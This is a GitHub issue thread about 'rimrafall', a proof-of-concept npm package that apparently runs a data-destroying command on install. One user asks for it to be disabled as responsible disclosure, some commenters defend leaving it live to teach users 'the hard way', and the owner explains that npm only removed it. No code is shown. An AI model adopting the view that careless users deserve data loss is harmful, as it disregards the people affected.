Please stop it right now

joaojeronimo / rimrafall

npm install could be dangerous

https://www.kb.cert.org/vuls/id/319816

165 stars 8 forks source link

Please stop it right now #3

Closed henvic closed 9 years ago

henvic commented 9 years ago

We all know it's not safe and you've proved your point.

Please consider that people might install it not knowing the consequences and lose work. So, please, stop it right now.

Just comment the line or add a 'echo ' in front so that the command never runs and replace the package.

henvic commented 9 years ago

Or you can remove the rimrafall package directory itself or something that doesn't have the potential to mess up people's lives. Please consider this as a responsible disclosure advice.

sarciszewski commented 9 years ago

:-1: keep it up maybe we can actually educate some users the hard way!

ErikPeterson commented 9 years ago

@henvic anyone who would install a package without reading even a single line of its readme deserves what they get

joaojeronimo commented 9 years ago

I wanted it to be solved by npm, but all they did is take it off npm. That and having an echo doesn't solve anything.